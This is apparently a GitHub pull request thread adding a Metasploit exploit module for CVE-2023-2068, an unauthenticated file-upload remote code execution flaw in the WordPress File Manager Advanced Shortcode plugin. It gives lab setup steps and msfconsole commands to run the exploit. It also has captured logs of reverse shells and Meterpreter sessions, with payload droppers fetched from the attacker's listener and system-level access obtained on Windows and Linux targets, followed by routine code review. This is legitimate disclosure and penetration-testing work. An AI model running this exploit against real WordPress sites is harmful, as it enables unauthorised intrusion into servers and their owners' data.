WordPress File Manager Advanced Shortcode Unauthenticated RCE [CVE-2023-2068]

[h00die-gr3y]

WordPress File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution through shortcode.

The WordPress plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode.
This leads to RCE in cases where the allowed MIME type list does not include PHP files.
In the worst case, this is available to unauthenticated users, but is also works in an authenticated configuration.

File Manager Advanced Shortcode plugin version 2.3.2 and lower are vulnerable.
To install the Shortcode plugin, File Manager Advanced version 5.0.5 or lower is required to keep the configuration vulnerable. Any user can exploit this vulnerability which results in access to the underlying operating system
with the same privileges under which the WordPress web services run.

This module has been tested on:

• Windows Server 2019 Standard and Kali Linux running on Raspberry PI.
• WordPress 6.2.2
• File Manager Advanced 5.0.5
• File Manager Advanced Shortcode 2.3.2

Instructions for a vulnerable WordPress installation:
For Windows and Linux follow these instructions to install and configure WordPress: Install WordPress locally

After you have successfully installed and configures WordPress, follow the below steps to install the vulnerable plugins and configure a web page with the file-manager-advanced shortcode embedded.

1. Download WordPress plugins:

• File Manager Advanced 5.0.5
• File Manager Advanced Shortcode 2.3.2

2. Login as admin in WordPress
3. On left side Menu, goto Plugins
4. Click Add New on the submenu
5. Page with installed Plugins appears. Click on the top on the button Add New
6. Page with list of Plugins appears. Click on the top on the button Upload Plugin
7. Page with browse button appears. Browse for file-manager-advanced.zip file that you have downloaded in step 1.
8. Click install button
9. Repeat same process for file-manager-advanced-shortcode-2.3.2-mdnhux.zip
10. When both plugins are installed successfully, configure a webpage with the file-manager-advanced shortcode embedded:

• Example [/] shortcode:

[file_manager_advanced login="yes" roles="author,editor,administrator" path="wp-content" hide="plugins" operations=block_users="5" view="grid" theme="light" lang ="en" upload_allow="image/png" upload_max_size="2G"]

12. Set the TARGETURI option with the uripath pointing to this webpage
13. Run the module and enjoy a reverse shell or meterpreter

Verification

• Start msfconsole
• use exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce
• set rhosts <ip-target>
• set rport <port>
• set target <0=PHP, 1=Unix Command, 2=Linux Dropper, 3=Windows Command, 4=Windows Dropper>
• exploit
• you should get a reverse shell or Meterpreter session depending on the payload and target settings

msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > info

       Name: Wordpress File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution through shortcode
     Module: exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce
   Platform: Windows, Unix, Linux, PHP
       Arch: cmd, php, x64, x86, aarch64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2023-05-31

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>
  Mateus Machado Tesser

Module side effects:
 artifacts-on-disk
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   PHP
      1   Unix Command
      2   Linux Dropper
      3   Windows Command
      4   Windows Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting                Required  Description
  ----       ---------------                --------  -----------
  Proxies                                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     192.168.201.10                 yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT      80                             yes       The target port (TCP)
  SSL        false                          no        Negotiate SSL/TLS for outgoing connections
  SSLCert                                   no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /wordpress/index.php/fma-auth  yes       File Manager Advanced (FMA) Shortcode URI path
  URIPATH                                   no        The URI to use for this exploit (default is random)
  VHOST                                     no        HTTP server virtual host
  WEBSHELL                                  no        The name of the webshell with extension php. Webshell name will be randomly generated if left unset.


  When TARGET is not 0:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all
                                       addresses.
  SRVPORT  1981             yes       The local port to listen on.

Payload information:

Description:
  The Wordpress plugin does not adequately prevent uploading files with disallowed MIME types when using the shortcode.
  This leads to RCE in cases where the allowed MIME type list does not include PHP files.
  In the worst case, this is available to unauthenticated users, but is also works in an authenticated configuration.
  File Manager Advanced Shortcode plugin version `2.3.2` and lower are vulnerable.
  To install the Shortcode plugin File Manager Advanced version `5.0.5` or lower is required to keep the configuration
  vulnerable. Any user privileges can exploit this vulnerability which results in access to the underlying operating system
  with the same privileges under which the Wordpress web services run.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2023-2068
  https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-2068
  https://packetstormsecurity.com/files/172707
  https://wpscan.com/vulnerability/58f72953-56d2-4d86-a49b-311b5fc58056


View the full module info with the info -d command.

Scenarios

Windows Server 2019 PHP - php/meterpreter/reverse_tcp

msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.55
[+] Deleted KBWxIdRChosZC.php
[*] Meterpreter session 1 opened (192.168.201.10:4444 -> 192.168.201.55:50380) at 2023-06-28 14:13:07 +0000

meterpreter > sysinfo
Computer    : WIN-BJDNH44EEDB
OS          : Windows NT WIN-BJDNH44EEDB 10.0 build 17763 (Windows Server 2016) AMD64
Meterpreter : php/windows
meterpreter > getuid
Server username: SYSTEM
meterpreter >

Kali Linux Server Unix Command - cmd/unix/reverse_bash

msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 5a669fda54
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted LlCresesS.php
[*] Command shell session 5 opened (192.168.201.10:4444 -> 192.168.201.10:56290) at 2023-06-28 15:34:20 +0000

uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Kali Linux Server Linux Dropper - linux/aarch64/meterpreter_reverse_tcp

msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 5a669fda54
[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp
[*] Using URL: http://192.168.201.10:1981/manX3C
[*] Client 192.168.201.10 (Wget/1.21.3) requested /manX3C
[*] Sending payload to 192.168.201.10 (Wget/1.21.3)
[+] Deleted nypafHKuf.php
[*] Meterpreter session 6 opened (192.168.201.10:4444 -> 192.168.201.10:38108) at 2023-06-28 15:36:11 +0000
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.201.10
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: www-data
meterpreter >

Windows Server 2019 Windows Command - cmd/windows/powershell/x64/meterpreter/reverse_tcp

msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
[*] Executing Windows Command for cmd/windows/powershell/x64/meterpreter/reverse_tcp
[*] Sending stage (200774 bytes) to 192.168.201.55
[+] Deleted HAJSKquhaDT.php
[*] Meterpreter session 2 opened (192.168.201.10:4444 -> 192.168.201.55:50464) at 2023-06-28 14:21:39 +0000

meterpreter > sysinfo
Computer        : WIN-BJDNH44EEDB
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Windows Server 2019 Windows Dropper - windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/http/wp_plugin_fma_shortcode_unauth_rce) > exploit

[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. fmakey successfully retrieved: 2a1a319c46
[*] Executing Windows Dropper for windows/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.10:1981/yRZ6hM
[*] Client 192.168.201.55 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1) requested /yRZ6hM
[*] Sending payload to 192.168.201.55 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1)
[*] Sending stage (200774 bytes) to 192.168.201.55
[+] Deleted hjAQqbEFAt.php
[*] Meterpreter session 4 opened (192.168.201.10:4444 -> 192.168.201.55:50519) at 2023-06-28 14:26:02 +0000
[*] Command Stager progress - 100.00% done (146/146 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer        : WIN-BJDNH44EEDB
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[h00die]

Please also add the plugin to https://github.com/rapid7/metasploit-framework/blob/master/data/wordlists/wp-exploitable-plugins.txt

[h00die]

does the normal check_plugin_version_from_readme not work for this one, or did you prefer another method because it was more in depth?

May also want a:

    unless wordpress_and_online?
      return Msf::Exploit::CheckCode::Safe('Server not online or not detected as wordpress')
    end

[h00die-gr3y]

Please also add the plugin to https://github.com/rapid7/metasploit-framework/blob/master/data/wordlists/wp-exploitable-plugins.txt

Will do !

[h00die-gr3y]

does the normal check_plugin_version_from_readme not work for this one, or did you prefer another method because it was more in depth?

May also want a:

    unless wordpress_and_online?
      return Msf::Exploit::CheckCode::Safe('Server not online or not detected as wordpress')
    end

Cool! Did not know that these already existed. I will add it to the check to make it more robust.

[h00die-gr3y]

@h00die ,
I have reviewed the check_plugin_version_from_readme logic but in all examples, you need to login as admin first.
Is that the case, because this will not work in my exploit. Therefore I have created another check that will identify if the file manager advanced shortcode plugin is installed and applied. See this Article to understand the logic behind this check.

[h00die]

you shouldn't need to login at all to use check_plugin_version_from_readme, unless this specific plugin is different. https://github.com/search?q=repo%3Arapid7%2Fmetasploit-framework%20check_plugin_version&type=code

I only looked at the first 10 or so, but many modules just call that as the singular thing for the check function

[h00die-gr3y]

Hi @h00die, figured out why it did not work. This particular plugin does not have a README ;-)

[bwatters-r7]

You should be able to remove this because of the ability to remove the powershell target.

[h00die-gr3y]

See 3425173.

[cgranleese-r7]

I didn't realise that this had conflicting files. So can't land just yet, but once that's sorted I'll be good to land 👍

I have tested this and everything is working as expected.

[adfoster-r7]

@h00die-gr3y Looks like the merge conflicts are stopping us from landing this. If you're able to rebase it we'll be able to land it; Or if you want I believe we can rebase it on our side 👍

[h00die-gr3y]

@adfoster-r7 I would appreciate if you can rebase it from your side.
I have tried to solve the conflict, but somehow I am not successful.
@h00die added his woocommerce-payments plugin entry in the file to support his exploit and I tried to fix by adding my plugin name again and pushed a commit. For whatever reason it still complains about a conflict.

[adfoster-r7]

Rebased on our side, thanks! 👍

I used git rebase upstream-master -i to replay your commits one at a time ontop of the latest master code; Then I fixed the merge conflict in your initial commits

I tried to fix by adding my plugin name again and pushed a commit

It turns out that adding an extra commit to the end won't resolve the merge conflict that was actually in your second commit

---

Thanks for the PR! Will get this landed now 🎉

[cgranleese-r7]

Release Notes

This PR adds a Wordpress exploit that makes use of the WordPress File Manager Advanced Shortcode 2.3.2 plugin, to gain unauthenticated Remote Code Execution through shortcode.